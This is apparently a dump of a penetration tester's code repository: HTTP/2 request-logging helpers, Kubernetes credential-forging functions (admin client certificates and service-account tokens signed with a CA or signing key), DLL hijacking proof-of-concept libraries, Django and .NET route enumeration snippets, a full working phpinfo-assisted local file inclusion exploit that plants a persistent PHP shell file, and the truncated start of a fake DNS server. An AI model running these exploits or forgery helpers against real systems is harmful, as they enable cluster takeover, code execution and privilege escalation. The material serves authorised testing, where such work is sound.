282 |             if not data:
283 |                 break
284 |
285 |             events = conn.receive_data(data)
286 |             print('Data received')
287 |             #print(events)
288 |             recent_stream = None
289 |             receive_event = b''
290 |             received_headers = {}
291 |             request_primitives = {}
292 |             received_data = b''
293 |             recent_stream = None
294 |             for event in events:
295 |                 if bool(getattr(event, 'stream_id', False)):
296 |                     recent_stream = event.stream_id
297 |                     if event.stream_id not in received_info:
298 |                         received_info[event.stream_id] = {'processed': False, 'data': b''}
299 |                 if isinstance(event, h2.events.RequestReceived):
300 |                     print(f'Receive event: {str(event)}')
301 |                     if 'receive' not in received_info[event.stream_id]:
302 |                         received_info[event.stream_id]['receive'] = event
303 |                         received_info[event.stream_id]['processed'] = False
304 |                     #receive_event = event
305 |                     #send_response(conn, event)
306 |                     received_headers = parse_headers(event)
307 |                     request_primitives = parse_primitives(event)
308 |                 if isinstance(event, h2.events.DataReceived):
309 |                     received_data = event.data
310 |                     print(f'Event data received: {str(event.data)}')
311 |                     received_info[event.stream_id]['data'] += event.data
312 |                     received_info[event.stream_id]['processed'] = False
313 |
314 |
315 |             for stream in received_info:
316 |                 if not received_info[stream].get('processed') and received_info[stream].get('receive') and received_info[stream].get('data'):
317 |                     send_response(conn, received_info[stream].get('receive'), data=received_info[stream].get('data'))
318 |                     socket_name = (lambda x: x if x.startswith('/') else '')(sock.getsockname())
319 |                     socket_name = replay['destination']
320 |                     curl_command = build_curl_command(parse_primitives(received_info[stream].get('receive')), parse_headers(received_info[stream].get('receive')), received_info[stream].get('data'), socket_name)
321 |                     print('Curl command to replicate received request: ' + curl_command)
322 |                     received_info[stream]['processed'] = True
323 |                     # just delete at this point??
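                    # (a sketch of the deletion mooted above: iterate over list(received_info)
                    # instead and then, assuming no further frames will arrive for a stream
                    # once it has been answered,
                    #     del received_info[stream]
                    # which also stops received_info growing over a long-lived connection)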
324 | 325 | 326 | #if receive_event: 327 | 328 | #if recent_stream and not received_info[recent_stream].get('processed', True): 329 | # #send_response(conn, receive_event, data=received_data if received_data else b'') 330 | # send_response(conn, received_info[event.stream_id].get('receive'), data=received_info[event.stream_id].get('data')) 331 | # received_info[recent_stream]['processed'] = True 332 | 333 | 334 | data_to_send = conn.data_to_send() 335 | if data_to_send: 336 | sock.sendall(data_to_send) 337 | 338 | #if received_headers and request_primitives: 339 | #if received_headers and request_primitives: 340 | #socket_name = (lambda x: x if x.startswith('/') else '')(sock.getsockname()) 341 | 342 | #print('Curl command to replicate received request: ' + build_curl_command(request_primitives, received_headers, received_data, socket_name)) 343 | except ConnectionResetError as e: 344 | print(str(e)) 345 | except BrokenPipeError as e: 346 | print(str(e)) 347 | print('===================================\n') 348 | 349 | 350 | sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) 351 | sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 352 | #sock.bind(('0.0.0.0', 8080)) 353 | sock.bind(socket_path) 354 | sock.listen(5) 355 | 356 | while True: 357 | handle(sock.accept()[0]) 358 | 359 | 360 | -------------------------------------------------------------------------------- /example_code/crypto_helpers.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.primitives.serialization import load_pem_private_key, load_pem_public_key 2 | from cryptography.hazmat.primitives import serialization 3 | from cryptography.hazmat.primitives.asymmetric import padding 4 | from cryptography import x509 5 | from cryptography.hazmat.primitives import hashes 6 | from cryptography.hazmat.primitives.asymmetric import padding 7 | from cryptography.hazmat.backends import default_backend 8 | from cryptography.exceptions import InvalidSignature 9 | from cryptography.hazmat.primitives.asymmetric import rsa 10 | from cryptography.x509.oid import NameOID 11 | import datetime 12 | import base64 13 | import hashlib 14 | import jwt 15 | import json 16 | 17 | # fetch server CA from API server unauth?? 
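# (one anonymous option, sketched on the assumption the API server is network
# reachable: pull the certificate presented during the TLS handshake, which is
# the CA itself only where the endpoint uses a self-signed cert, e.g.
#     import ssl
#     pem = ssl.get_server_certificate(('10.0.0.1', 6443))  # example address
# )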
18 | 19 | def generate_private_key(keysize=2048, exp=65537): 20 | private_key = rsa.generate_private_key( 21 | public_exponent=exp, 22 | key_size=keysize 23 | ) 24 | return private_key.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption()) 25 | 26 | def private_key_to_disk(key_obj, output_file): 27 | open(output_file, 'wb').write(key_obj.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption())) 28 | 29 | def private_key_from_file(key_file): 30 | return load_pem_private_key(open(key_file, 'rb').read(), password=None) 31 | 32 | def cert_from_file(cert_file): 33 | return x509.load_pem_x509_certificate(data=open(cert_file, 'rb').read(), backend=default_backend()) 34 | 35 | 36 | def public_key_from_private(key_file): 37 | return private_key_from_file(key_file).public_key() 38 | 39 | def cert_to_pem(cert): 40 | return cert.public_bytes(encoding=serialization.Encoding.PEM) 41 | 42 | def key_to_pem(key): 43 | return key.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption()) 44 | 45 | def pub_key_to_pem(pub): 46 | return pub.public_bytes(encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.PKCS1) 47 | 48 | 49 | # TODO: Write this properly, use verify_directly_issued_by 50 | def verify_cert_from_cert(cert_file, signing_cert_file, padder=padding.PKCS1v15()): 51 | '''Doesnt work as well as .verify_directly_issued_by() misses issuer/subject match but checks signing''' 52 | chain = cert_from_file(signing_cert_file) 53 | issuer_public_key = chain.public_key() 54 | cert_to_check = cert_from_file(cert_file) 55 | try: 56 | issuer_public_key.verify( 57 | cert_to_check.signature, 58 | cert_to_check.tbs_certificate_bytes, 59 | padder, 60 | cert_to_check.signature_hash_algorithm, 61 | ) 62 | return True 63 | except InvalidSignature: 64 | return False 65 | except: 66 | raise 67 | 68 | 69 | 70 | 71 | def match_cert_and_key(cert_file, key_file): 72 | cert = cert_from_file(cert_file) 73 | cert_key = cert.public_key() 74 | pub_key = public_key_from_private(key_file) 75 | return cert_key == pub_key 76 | 77 | 78 | def verify_cert_from_key(cert_file, key_file, padder=padding.PKCS1v15()): 79 | issuer_public_key = public_key_from_private(key_file) 80 | cert_to_check = cert_from_file(cert_file) 81 | try: 82 | issuer_public_key.verify( 83 | cert_to_check.signature, 84 | cert_to_check.tbs_certificate_bytes, 85 | padder, 86 | cert_to_check.signature_hash_algorithm, 87 | ) 88 | return True 89 | except InvalidSignature: 90 | return False 91 | except: 92 | raise 93 | 94 | 95 | 96 | # system might need to be set for unicode strings...? 97 | def create_certificate(public_key, signer_key, signer_ca, exp=365, common_name='kubernetes-admin', org_names = ['system:masters'], verify=True): 98 | one_day = datetime.timedelta(1, 0, 0) 99 | 100 | builder = x509.CertificateBuilder() 101 | orgs = [x509.NameAttribute(NameOID.ORGANIZATION_NAME, a) for a in org_names] 102 | builder = builder.subject_name(x509.Name(orgs + [x509.NameAttribute(NameOID.COMMON_NAME, common_name)])) 103 | builder = builder.issuer_name(signer_ca.subject) # not working when I set this manually, why? 
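    # (likely answer: chain checks compare this cert's issuer to the CA cert's
    # subject byte for byte, so a hand-built name must reproduce the exact
    # attributes, order and encodings; e.g. a sketch like
    #     builder.issuer_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, 'kubernetes')]))
    # fails verify_directly_issued_by() whenever the real CA subject holds
    # anything more, while reusing signer_ca.subject always matches)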
104 | builder = builder.not_valid_before(datetime.datetime.today() - one_day) 105 | builder = builder.not_valid_after(datetime.datetime.today() + (one_day * exp)) 106 | builder = builder.serial_number(x509.random_serial_number()) 107 | builder = builder.public_key(public_key) 108 | builder = builder.add_extension( 109 | x509.KeyUsage(digital_signature=True, key_encipherment=True, key_cert_sign=False, 110 | key_agreement=False, content_commitment=False, data_encipherment=False, 111 | crl_sign=False, encipher_only=False, decipher_only=False), critical=True 112 | ) 113 | builder = builder.add_extension( 114 | x509.ExtendedKeyUsage([x509.oid.ExtendedKeyUsageOID.CLIENT_AUTH]), critical=False 115 | ) 116 | builder = builder.add_extension( 117 | x509.BasicConstraints(ca=False, path_length=None), critical=True, 118 | ) 119 | builder = builder.add_extension( 120 | x509.AuthorityKeyIdentifier.from_issuer_public_key(signer_key.public_key()), critical=False 121 | ) 122 | 123 | certificate = builder.sign( 124 | private_key=signer_key, algorithm=hashes.SHA256(), 125 | ) 126 | 127 | # sanity check, verifies issuer/subject and key sign 128 | if verify: 129 | certificate.verify_directly_issued_by(signer_ca) 130 | 131 | return certificate 132 | 133 | 134 | 135 | def cert_to_disk(cert_obj, output_filename): 136 | open(output_filename, 'wb').write(cert_obj.public_bytes(encoding=serialization.Encoding.PEM)) 137 | 138 | 139 | 140 | def dump_cert_auth(cert, key): 141 | out = ' client-certificate-data: {}\n'.format(base64.b64encode(cert_to_pem(cert)).decode('utf8')) 142 | out += ' client-key-data: {}\n'.format(base64.b64encode(key_to_pem(key)).decode('utf8')) 143 | return out 144 | 145 | 146 | 147 | 148 | def create_token_rsa(key, keyid, exp_window=3600, audience='theia-web-shell', subject='offensive-security', issuer='custom-auth'): 149 | '''Helper function to generate authentication tokens''' 150 | t = int(datetime.datetime.timestamp(datetime.datetime.now(datetime.timezone.utc))) 151 | iat = t 152 | nbf = t 153 | exp = iat + exp_window 154 | sd = {'exp' : exp, 'iat': iat, 'nbf' : nbf, 'iss': issuer, 'sub': subject, 'aud': audience} 155 | return jwt.encode(sd, key, algorithm='RS256', headers={'kid': keyid}) 156 | 157 | 158 | 159 | def forge_cert_authentication(ca_key_file, ca_cert_file, user_name='kubernetes-admin', user_key_file=None, permissions=['system:masters'], cert_expiry_days=365): 160 | ca_key = private_key_from_file(ca_key_file) 161 | ca_cert = cert_from_file(ca_cert_file) 162 | user_key = None 163 | if not user_key_file: 164 | user_key = rsa.generate_private_key(public_exponent=65537, key_size=2048) 165 | else: 166 | user_key = private_key_from_file(user_key_file) 167 | forged_cert = create_certificate(user_key.public_key(), ca_key, ca_cert, exp=cert_expiry_days, common_name=user_name, org_names=permissions) 168 | return dump_cert_auth(forged_cert, user_key) 169 | 170 | 171 | def b64dec(val): 172 | return base64.urlsafe_b64decode(val + '==') 173 | 174 | 175 | def gen_public_key_keyid(pub_key_obj): 176 | return base64.urlsafe_b64encode(hashlib.sha256(pub_key_obj.public_bytes(encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo)).digest()).decode().rstrip('=') 177 | 178 | 179 | 180 | def create_sa_token(sa_key, serviceaccount_name, serviceaccount_uid, namespace='default', aud='https://kubernetes.default.svc.cluster.local', iss='https://kubernetes.default.svc.cluster.local'): 181 | t = int(datetime.datetime.timestamp(datetime.datetime.now(datetime.timezone.utc))) 
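    # 31536000 seconds = 365 days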
182 | exp = 31536000 183 | sd = {'aud': [aud], 184 | 'exp': t+exp, 185 | 'iat': t, 186 | 'iss': iss, 187 | 'kubernetes.io': { 188 | 'namespace': namespace, 189 | 'serviceaccount': {'name': serviceaccount_name, 'uid': serviceaccount_uid} 190 | }, 191 | 'nbf': t, 192 | 'sub': 'system:serviceaccount:{}:{}'.format(namespace, serviceaccount_name)} 193 | keyid = gen_public_key_keyid(sa_key.public_key()) 194 | return jwt.encode(sd, sa_key, algorithm='RS256', headers={'kid': keyid}) 195 | 196 | 197 | 198 | 199 | def verify_sa_token(sa_pub_key, token): 200 | audience = json.loads(b64dec(token.split('.')[1]).decode())['aud'] 201 | return jwt.decode(token, sa_pub_key, 'RS256', audience=audience) 202 | 203 | 204 | 205 | -------------------------------------------------------------------------------- /example_code/ddlmb.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | // Example code for dll hijacking 5 | // x86_64-w64-mingw32-gcc dll.c -shared -o dll.dll 6 | 7 | 8 | /* 9 | typedef struct _WTS_PROCESS_INFOW { 10 | DWORD SessionId; 11 | DWORD ProcessId; 12 | LPWSTR pProcessName; 13 | PSID pUserSid; 14 | } WTS_PROCESS_INFOW, *PWTS_PROCESS_INFOW; 15 | 16 | extern "C" __declspec(dllexport) BOOL __cdecl WTSEnumerateProcessesW (HANDLE hServer, DWORD Reserved, DWORD Version, PWTS_PROCESS_INFOW* ppProcessInfo, DWORD* pCount) { 17 | return false; 18 | } 19 | 20 | extern "C" __declspec(dllexport) BOOL __cdecl WTSQueryUserToken (ULONG SessionID, PHANDLE phToken) { 21 | return false; 22 | } 23 | 24 | extern "C" __declspec(dllexport) void __cdecl WTSFreeMemory(PVOID pMemory) { 25 | } 26 | 27 | extern "C" __declspec(dllexport) BOOL __cdecl WTSEnumerateSessionsW(){ 28 | return false; 29 | } 30 | */ 31 | 32 | 33 | char debugMsg [1024] = ""; 34 | 35 | 36 | extern "C" __declspec(dllexport) BOOL __cdecl PE1(){ 37 | //system("whoami > C:\\sample\\pe1.txt"); 38 | MessageBox (NULL, debugMsg, "1", MB_OK); 39 | return false; 40 | } 41 | 42 | 43 | 44 | extern "C" __declspec(dllexport) BOOL __cdecl PE2(){ 45 | //system("whoami > C:\\sample\\pe2.txt"); 46 | MessageBox (NULL, debugMsg, "2", MB_OK); 47 | return false; 48 | } 49 | 50 | 51 | // ordinal 3 52 | extern "C" __declspec(dllexport) BOOL __cdecl PE3(){ 53 | MessageBox (NULL, debugMsg, "3", MB_OK); 54 | system("whoami > C:\\sample\\pe3.txt"); 55 | return false; 56 | } 57 | 58 | 59 | 60 | 61 | 62 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){ 63 | switch(dwReason){ 64 | case DLL_PROCESS_ATTACH: 65 | //MessageBox (NULL, debugMsg, "Debug", MB_OK); 66 | // system("whoami > C:\\users\\public\\documents\\whoami.txt"); 67 | break; 68 | case DLL_PROCESS_DETACH: 69 | break; 70 | case DLL_THREAD_ATTACH: 71 | break; 72 | case DLL_THREAD_DETACH: 73 | break; 74 | } 75 | return TRUE; 76 | } 77 | -------------------------------------------------------------------------------- /example_code/django_audit_snippets.py: -------------------------------------------------------------------------------- 1 | from django.conf import settings 2 | from urls import urlpatterns 3 | 4 | ''' 5 | Access shell via 6 | ./manage.py shell 7 | (or shell_plus if you have django-extensions) 8 | Dont forget you may need to set environment variables: 9 | - DJANGO_SETTINGS_MODULE to the settings file (python module load syntax like settings.filename) and 10 | - PYTHONPATH to include the path where the Django code sits 11 | 12 | Install ipython and django-extensions to get a better shell (shell_plus) 13 | pip install 
django-extensions 14 | 15 | This also has show_urls command which will do something similar to get_urls_friendly below 16 | 17 | urls will not contain urlpatterns in later django releases 18 | ''' 19 | 20 | 21 | # all the configured apps settings are now in here 22 | settings 23 | 24 | # this prints out mapped urls and associated views 25 | def get_urls_friendly(raw_urls, nice_urls=[], urlbase=''): 26 | '''Recursively builds a list of all the urls in the current project and the name of their associated view''' 27 | for entry in raw_urls: 28 | fullurl = (urlbase + entry.regex.pattern).replace('^','') 29 | if entry.callback: 30 | viewname = entry.callback.func_name 31 | nice_urls.append('%s - %s' %(fullurl, viewname)) 32 | else: 33 | get_urls_friendly(entry.url_patterns, nice_urls, fullurl) 34 | nice_urls = sorted(list(set(nice_urls))) 35 | return nice_urls 36 | -------------------------------------------------------------------------------- /example_code/dll.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | // Example code for dll hijacking 5 | // x86_64-w64-mingw32-gcc dll.c -shared -o dll.dll 6 | 7 | 8 | typedef struct _WTS_PROCESS_INFOW { 9 | DWORD SessionId; 10 | DWORD ProcessId; 11 | LPWSTR pProcessName; 12 | PSID pUserSid; 13 | } WTS_PROCESS_INFOW, *PWTS_PROCESS_INFOW; 14 | 15 | extern "C" __declspec(dllexport) BOOL __cdecl WTSEnumerateProcessesW (HANDLE hServer, DWORD Reserved, DWORD Version, PWTS_PROCESS_INFOW* ppProcessInfo, DWORD* pCount) { 16 | return false; 17 | } 18 | 19 | extern "C" __declspec(dllexport) BOOL __cdecl WTSQueryUserToken (ULONG SessionID, PHANDLE phToken) { 20 | return false; 21 | } 22 | 23 | extern "C" __declspec(dllexport) void __cdecl WTSFreeMemory(PVOID pMemory) { 24 | } 25 | 26 | extern "C" __declspec(dllexport) BOOL __cdecl WTSEnumerateSessionsW(){ 27 | return false; 28 | } 29 | 30 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){ 31 | switch(dwReason){ 32 | case DLL_PROCESS_ATTACH: 33 | system("whoami > C:\\users\\public\\documents\\whoami.txt"); 34 | break; 35 | case DLL_PROCESS_DETACH: 36 | break; 37 | case DLL_THREAD_ATTACH: 38 | break; 39 | case DLL_THREAD_DETACH: 40 | break; 41 | } 42 | return TRUE; 43 | } -------------------------------------------------------------------------------- /example_code/dll_with_proxies.c: -------------------------------------------------------------------------------- 1 | // i686-w64-mingw32-g++ dll.c -lws2_32 -o wtsapi32.dll -shared 2 | #include 3 | #include 4 | #include 5 | #include 6 | BOOL IsElevated() { 7 | BOOL fRet = FALSE; 8 | HANDLE hToken = NULL; 9 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 10 | TOKEN_ELEVATION Elevation; 11 | DWORD cbSize = sizeof(TOKEN_ELEVATION); 12 | if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) { 13 | fRet = Elevation.TokenIsElevated; 14 | } 15 | } 16 | if (hToken) { 17 | CloseHandle(hToken); 18 | } 19 | return fRet; 20 | } 21 | asm (".section .drectve\n\t.ascii \" -export:WTSEnumerateProcessesW=c:/windows/system32/wtsapi32.WTSEnumerateProcessesW\""); 22 | asm (".section .drectve\n\t.ascii \" -export:WTSQueryUserToken=c:/windows/system32/wtsapi32.WTSQueryUserToken\""); 23 | asm (".section .drectve\n\t.ascii \" -export:WTSFreeMemory=c:/windows/system32/wtsapi32.WTSFreeMemory\""); 24 | asm (".section .drectve\n\t.ascii \" -export:WTSEnumerateSessionsW=c:/windows/system32/wtsapi32.WTSEnumerateSessionsW\""); 25 | BOOL WINAPI 
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){ 26 | BOOL elevated; 27 | char username[UNLEN+1]; 28 | DWORD username_len = UNLEN + 1; 29 | char out[UNLEN+28]; 30 | switch(dwReason){ 31 | case DLL_PROCESS_ATTACH: 32 | elevated = IsElevated(); 33 | GetUserName(username, &username_len); 34 | strcpy(out, "Running "); 35 | if (elevated) { 36 | strcat(out, "elevated as user "); 37 | } else { 38 | strcat(out, "unelevated as user "); 39 | } 40 | strcat(out, username); 41 | MessageBox(0, out, "Dll Hijacking POC Code", 0); 42 | break; 43 | case DLL_PROCESS_DETACH: 44 | break; 45 | case DLL_THREAD_ATTACH: 46 | break; 47 | case DLL_THREAD_DETACH: 48 | break; 49 | } 50 | return TRUE; 51 | } -------------------------------------------------------------------------------- /example_code/getControllers.cs: -------------------------------------------------------------------------------- 1 | // lists controllers when added to a web application 2 | // returns result as a string 3 | public String getControllers() 4 | { 5 | var asms = AppDomain.CurrentDomain.GetAssemblies().Where(a => a.GetName().Name != "System.Web.Mvc"); 6 | String output = ""; 7 | foreach (Assembly asm in asms) 8 | { 9 | String s = ""; 10 | try 11 | { 12 | var controllers = asm.GetExportedTypes().Where(t => typeof(ControllerBase).IsAssignableFrom(t)); 13 | if (controllers.Count() > 0) 14 | { 15 | s += string.Format("\r\n{0}\r\nAssembly: {1}\r\n{2}\r\n", new String('=',32), asm.GetName().Name, new String('=', 32)); 16 | } 17 | foreach (Type controller in controllers) 18 | { 19 | s += string.Format("{0}\r\nController: {1}\r\n{2}\r\n", new String('-', 32), controller.Name, new String('-', 32)); 20 | List bannedDeclaringTypes = new List { "System.Object", "System.Web.Mvc.ControllerBase", "System.Web.Mvc.Controller" }; 21 | //List bannedDeclaringTypes = new List { }; 22 | String cattribs = "Controller Attributes: "; 23 | var cattributes = controller.GetCustomAttributes(false); 24 | foreach (var attribute in cattributes) 25 | { 26 | cattribs += string.Format("{0},", attribute); 27 | } 28 | s += string.Format("{0}\r\n", cattribs); 29 | var methods = controller.GetMethods().Where(m => m.IsPublic && !bannedDeclaringTypes.Contains(m.DeclaringType.FullName)); 30 | foreach (var method in methods) 31 | { 32 | s += string.Format("Method: {0}\r\n", method.Name); 33 | 34 | String attribs = "Method Attributes: "; 35 | var attributes = method.GetCustomAttributes(false); 36 | foreach (var attribute in attributes) 37 | { 38 | attribs += string.Format("{0},", attribute); 39 | } 40 | s += string.Format("{0}\r\n", attribs); 41 | 42 | var parameters = method.GetParameters(); 43 | String pdata = "Method Parameters: "; 44 | foreach (var param in parameters) 45 | { 46 | pdata += string.Format("(Name: {0}, Type: {1}),", param.Name, param.ParameterType.Name); 47 | } 48 | s += string.Format("{0}\r\n", pdata); 49 | 50 | s += string.Format("Method Return Type: {0}\r\n\r\n", method.ReturnType.Name); 51 | } 52 | } 53 | } 54 | catch 55 | { 56 | s += string.Format("\r\nAssembly {0} failed parsing\r\n", asm.GetName().Name); 57 | } 58 | output += s; 59 | } 60 | return output; 61 | } 62 | -------------------------------------------------------------------------------- /exploits/phpinfo_lfi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # Based on the original code from Insomnias paper linked below, updated for python3, to tweak some settings and for readability because ow my eyes... 
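# In short: phpinfo() echoes back the [tmp_name] of any file uploaded with the
# request, so one connection POSTs a PHP payload and reads the temporary file
# path out of the padded phpinfo response while a second connection includes
# that path through the LFI before PHP cleans the upload up. Original paper: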
3 | # https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
4 |
5 | # It's not uncommon to have to try this a few times before it successfully works
6 | # The output_buffering setting in php (viewable in phpinfo output) must be enabled for this to work
7 | # No TLS support, you will need to SSL wrap the socket connection yourself to add this capability
8 |
9 | import sys
10 | import threading
11 | import socket
12 |
13 | # Change the following six constants to match your requirements
14 |
15 | # Request to send to trigger the LFI, values in square brackets are replaced as needed by the exploit code and need to be included
16 | LFIREQ = """GET /index.php?file=../../../../../../..[INCLUDEFILE] HTTP/1.1\r
17 | Host: [HOSTNAME][PORT]\r
18 | User-Agent: Mozilla/4.0\r
19 | Proxy-Connection: Keep-Alive\r
20 | \r
21 | \r
22 | """
23 |
24 | # Location of the phpinfo() script
25 | INFOURL='/phpinfo.php'
26 |
27 | # location where you want the permanent LFI payload to be written
28 | PAYLOADFILE='/tmp/includefile'
29 |
30 | # contents you want to write to the permanent LFI payload, anything containing single quotes untested and will require PHP specific escaping
31 | PAYLOADCONTENTS=''
32 |
33 | # size of padding to apply in headers and url to increase response size, needs to not overflow receiving web servers size capabilities in these areas, as big as possible is usually best
34 | PADDING=8000
35 |
36 | # maximum number of times to attempt the attack before giving up
37 | MAXATTEMPTS=2000
38 |
39 |
40 |
41 | # Shouldn't need to change anything below this point
42 |
43 | REQ1 = """POST [INFOURL]?a=[PADDING] HTTP/1.1\r
44 | Host: [HOSTNAME][PORT]\r
45 | Cookie: cookie=[PADDING]\r
46 | HTTP_ACCEPT: [PADDING]\r
47 | HTTP_USER_AGENT: [PADDING]\r
48 | HTTP_ACCEPT_LANGUAGE: [PADDING]\r
49 | HTTP_PRAGMA: [PADDING]\r
50 | Content-Type: multipart/form-data; boundary=---------------------------7db268605ae\r
51 | Content-Length: [LENGTH]\r
52 | \r
53 | """
54 |
55 | REQ1_DATA = """-----------------------------7db268605ae\r
56 | Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
57 | Content-Type: text/plain\r
58 | \r
59 | [PAYLOAD]\r
60 | -----------------------------7db268605ae"""
61 |
62 |
63 | def setup(host, port):
64 |     tag="Security Test"
65 |     payload = tag + """<?php file_put_contents('{}', '{}'); ?>\r\n""".format(PAYLOADFILE, PAYLOADCONTENTS)
66 |     request_data = REQ1_DATA.replace('[PAYLOAD]', payload)
67 |     params = {
68 |         'PADDING': "A" * PADDING,
69 |         'LENGTH': str(len(request_data)),
70 |         'HOSTNAME' : host,
71 |         'PORT': ':{}'.format(port) if port != 80 else '',
72 |         'INFOURL' : INFOURL
73 |
74 |     }
75 |     lfireq = LFIREQ
76 |     request = REQ1
77 |     for key in params:
78 |         request = request.replace('[{}]'.format(key), params[key])
79 |         lfireq = lfireq.replace('[{}]'.format(key), params[key])
80 |
81 |     request += request_data
82 |
83 |     return(request, tag, lfireq)
84 |
85 |
86 |
87 |
88 | def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
89 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
90 |     s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
91 |
92 |     s.connect((host, port))
93 |     s2.connect((host, port))
94 |
95 |     s.send(phpinforeq.encode())
96 |     d = b""
97 |     while len(d) < offset:
98 |         d += s.recv(offset)
99 |     if b"[tmp_name] =" in d:
100 |         try:
101 |             i = d.index(b"[tmp_name] =")
102 |             fn = d[i+17:i+31]
103 |         except ValueError:
104 |             return None
105 |
106 |         lfireq = lfireq.replace('[INCLUDEFILE]', fn.decode('utf8'))
107 |         s2.send(lfireq.encode())
108 |         d = s2.recv(4096)
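        # (a single read is enough here: we only check whether the tag was echoed back, not the full include output)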
109 | s.close() 110 | s2.close() 111 | 112 | if d.find(tag.encode()) != -1: 113 | return fn 114 | 115 | counter=0 116 | class ThreadWorker(threading.Thread): 117 | def __init__(self, e, l, m, *args): 118 | threading.Thread.__init__(self) 119 | self.event = e 120 | self.lock = l 121 | self.maxattempts = m 122 | self.args = args 123 | 124 | def run(self): 125 | global counter 126 | while not self.event.is_set(): 127 | with self.lock: 128 | if counter >= self.maxattempts: 129 | return 130 | counter+=1 131 | 132 | try: 133 | x = phpInfoLFI(*self.args) 134 | if self.event.is_set(): 135 | break 136 | if x: 137 | print("\nGot it! Shell created in {}".format(PAYLOADFILE)) 138 | self.event.set() 139 | 140 | except socket.error: 141 | return 142 | 143 | 144 | def getOffset(host, port, phpinforeq): 145 | """Gets offset of tmp_name in the php output""" 146 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 147 | s.connect((host,port)) 148 | s.send(phpinforeq.encode()) 149 | 150 | d = b"" 151 | while True: 152 | i = s.recv(4096) 153 | d+=i 154 | if i == "": 155 | break 156 | # detect the final chunk 157 | if i.endswith(b"0\r\n\r\n"): 158 | break 159 | s.close() 160 | i = d.find(b"[tmp_name] =") 161 | if i == -1: 162 | raise ValueError("No php tmp_name in phpinfo output") 163 | 164 | print("found %s at %i" % (d[i:i+10],i)) 165 | # padded up a bit 166 | return i+256 167 | 168 | def main(): 169 | 170 | print("LFI With PHPInfo()") 171 | print("-=" * 30) 172 | 173 | if len(sys.argv) < 2: 174 | print("Usage: %s host [port] [threads]" % sys.argv[0]) 175 | sys.exit(1) 176 | 177 | try: 178 | host = socket.gethostbyname(sys.argv[1]) 179 | except socket.error as e: 180 | print("Error with hostname %s: %s" % (sys.argv[1], e)) 181 | sys.exit(1) 182 | 183 | port=80 184 | try: 185 | port = int(sys.argv[2]) 186 | except IndexError: 187 | pass 188 | except ValueError as e: 189 | print("Error with port %d: %s" % (sys.argv[2], e)) 190 | sys.exit(1) 191 | 192 | poolsz=10 193 | try: 194 | poolsz = int(sys.argv[3]) 195 | except IndexError: 196 | pass 197 | except ValueError as e: 198 | print("Error with poolsz %d: %s" % (sys.argv[3], e)) 199 | sys.exit(1) 200 | 201 | print("Getting initial offset...", end=' ') 202 | reqphp, tag, reqlfi = setup(host, port) 203 | offset = getOffset(host, port, reqphp) 204 | sys.stdout.flush() 205 | 206 | maxattempts = MAXATTEMPTS 207 | e = threading.Event() 208 | l = threading.Lock() 209 | 210 | print("Spawning worker pool (%d)..." % poolsz) 211 | sys.stdout.flush() 212 | 213 | tp = [] 214 | for i in range(0,poolsz): 215 | tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag)) 216 | 217 | for t in tp: 218 | t.start() 219 | try: 220 | while not e.wait(1): 221 | if e.is_set(): 222 | break 223 | with l: 224 | sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts)) 225 | sys.stdout.flush() 226 | if counter >= maxattempts: 227 | break 228 | print() 229 | if e.is_set(): 230 | print("Woot! 
\m/") 231 | else: 232 | print(":(") 233 | except KeyboardInterrupt: 234 | print("\nTelling threads to shutdown...") 235 | e.set() 236 | 237 | print("Shuttin' down...") 238 | for t in tp: 239 | t.join() 240 | 241 | if __name__=="__main__": 242 | print("Don't forget to modify the application constants to match your requirements") 243 | main() 244 | -------------------------------------------------------------------------------- /helper_servers/dns.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import socket 3 | import sys 4 | 5 | 6 | # My minor modification of pyminifakeDNS, originally by Francisco Santos 7 | 8 | class DNSQuery: 9 | def __init__(self, data): 10 | self.data=data 11 | self.dominio='' 12 | 13 | tipo = (ord(data[2]) >> 3) & 15 # Opcode bits 14 | if tipo == 0: # Standard query 15 | ini=12 16 | lon=ord(data[ini]) 17 | while lon != 0: 18 | self.dominio+=data[ini+1:ini+lon+1]+'.' 19 | ini+=lon+1 20 | lon=ord(data[ini]) 21 | 22 | def request(self, ip): 23 | packet='' 24 | if self.dominio: 25 | packet+=self.data[:2] + "\x81\x80" 26 | packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts 27 | packet+=self.data[12:] # Original Domain Name Question 28 | packet+='\xc0\x0c' # Pointer to domain name 29 | packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes 30 | packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP 31 | return packet 32 | 33 | if __name__ == '__main__': 34 | 35 | try: 36 | ip = sys.argv[1] 37 | socket.inet_aton(ip) 38 | except: 39 | print 'Provide IP address to resolve all names 